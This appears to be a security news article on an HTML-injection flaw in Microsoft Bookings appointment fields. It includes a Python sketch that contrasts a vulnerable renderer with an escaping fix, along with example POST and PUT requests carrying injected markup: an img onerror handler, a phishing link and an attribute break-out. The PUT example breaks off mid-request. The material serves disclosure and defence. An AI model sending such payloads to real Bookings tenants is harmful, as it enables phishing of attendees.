Microsoft Bookings Vulnerability Allows Unauthorized Changes to Meeting Details
Security researchers have uncovered a significant vulnerability in Microsoft Bookings, the scheduling tool integrated with Microsoft 365.
The flaw, discovered through technical analysis of the service’s appointment creation and update APIs, allows unauthorized modification of meeting details, posing risks such as phishing, calendar manipulation, and information leakage.
Technical Details and Vulnerability Overview
The vulnerability arises from inadequate input validation and sanitization in several key fields used by Microsoft Bookings.

When a user, whether a legitimate customer or a malicious actor, creates or modifies a meeting, the following API fields are not sufficiently filtered:
- appointment.serviceNotes
- appointment.additionalNotes
- appointment.body.content
These fields accept arbitrary HTML, which is then embedded unescaped in confirmation emails, Teams invitations, and the attached ICS (calendar) files, so a customer-supplied payload is rendered in the context of the business and every other attendee.
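To make the mechanism concrete, the following Python sketch is an added example, not code from the researchers or from Microsoft. It models the three fields named above plus joinWebUrl on a constructed appointment, shows a naive renderer that concatenates them into the HTML mail and the ICS DESCRIPTION (the behaviour the report describes), and beside it a hardened renderer that HTML-escapes every customer-controlled field, allow-lists the join link to a clean https URL, and applies RFC 5545 text escaping to the calendar line. The rendering functions, the sample values and the detection helper are all hypothetical; only the field names come from the report.

```python
"""Added example (not Microsoft's or the researchers' code): how unescaped
Bookings appointment fields reach email HTML and ICS, and how escaping and
an allow-listed join URL neutralise the injection."""
import html
import re
from urllib.parse import urlparse

# Constructed sample appointment, shaped like the request body in the report.
INJECTED = {
    "serviceNotes": "Injected Note!",
    "additionalNotes": 'Please <a href="https://evil.example/login">re-confirm</a>',
    "body": {"contentType": "html",
             "content": '<img src=x onerror="alert(1)">Join meeting here'},
    "joinWebUrl": 'https://legit.com">Malicious Link',
}

TAG_RE = re.compile(r"<[^>]+>")


def render_email_vulnerable(appt: dict) -> str:
    """Naive rendering: customer fields are concatenated straight into the mail."""
    return (f"<p>{appt['serviceNotes']}</p>"
            f"<p>{appt['additionalNotes']}</p>"
            f"<div>{appt['body']['content']}</div>"
            f'<a href="{appt["joinWebUrl"]}">Join</a>')


def safe_join_url(url: str) -> str:
    """Allow-list the join link: https only, with a host, and none of the
    characters that break out of an attribute. Anything else is dropped."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.netloc or re.search(r'[<>"\'\s]', url):
        return ""
    return url


def render_email_hardened(appt: dict) -> str:
    """Escape every customer-controlled field. body.content is treated as text
    too: the party that fills these fields must not be able to author HTML."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    link = safe_join_url(appt["joinWebUrl"])
    link_html = f'<a href="{esc(link)}">Join</a>' if link else ""
    return (f"<p>{esc(appt['serviceNotes'])}</p>"
            f"<p>{esc(appt['additionalNotes'])}</p>"
            f"<div>{esc(appt['body']['content'])}</div>"
            f"{link_html}")


def ics_escape(text: str) -> str:
    """RFC 5545 TEXT escaping for DESCRIPTION/SUMMARY property values."""
    return (text.replace("\\", "\\\\").replace(";", "\\;")
                .replace(",", "\\,").replace("\n", "\\n"))


def ics_description(appt: dict) -> str:
    """DESCRIPTION line for the attached .ics: tags are stripped (the value is
    plain text), then the result is escaped. Writing the raw fields here is
    what lets injected markup ride along into the calendar file."""
    plain = TAG_RE.sub("", f"{appt['serviceNotes']}\n{appt['additionalNotes']}")
    return "DESCRIPTION:" + ics_escape(plain)


def find_html_injection(appt: dict) -> list:
    """Detection check (for a reviewer, a proxy rule, or an audit script):
    which of the reported fields carry markup or an attribute break-out."""
    candidates = {
        "appointment.serviceNotes": appt.get("serviceNotes", ""),
        "appointment.additionalNotes": appt.get("additionalNotes", ""),
        "appointment.body.content": appt.get("body", {}).get("content", ""),
        "appointment.joinWebUrl": appt.get("joinWebUrl", ""),
    }
    return [name for name, val in candidates.items()
            if TAG_RE.search(val) or '"' in val or "<" in val]


if __name__ == "__main__":
    print(render_email_vulnerable(INJECTED))
    print(render_email_hardened(INJECTED))
    print(ics_description(INJECTED))
    print(find_html_injection(INJECTED))
```

Run it and compare the two email renderings: the vulnerable one carries a live img onerror handler and a join anchor whose href has been closed early by the injected quote, while the hardened one shows the same strings as inert text and drops the malformed link entirely rather than trying to repair it. The same escape-or-reject rule is what the attached ICS needs, since calendar clients render the DESCRIPTION they are handed.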

Example: Exploiting the Bookings API
1. Appointment Creation (POST Request)
POST /BookingsService/api/V1/bookingBusinessesc2/[email protected]/appointments?app=BookingsC2&n=11 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
  "appointment": {
    "serviceNotes": "Injected Note!",
    "body": {
      "contentType": "html",
      "content": "Join meeting here"
    },
    ...
  }
}
Because the service does not escape these values, this request causes the injected HTML to be rendered in every meeting-related email and invitation sent for the appointment.
2. Appointment Modification via Rescheduling (PUT Request)
PUT /BookingsService/api/V1/bookingBusinessesc2/[email protected]/appointments/[AppointmentID]?app=BookingsC2&n=16 HTTP/1.1
Host: outlook.office365.com
Content-Type: application/json
{
  "appointment": {
    "serviceNotes": "Click me!",
    "joinWebUrl": "https://legit.com">Malicious Link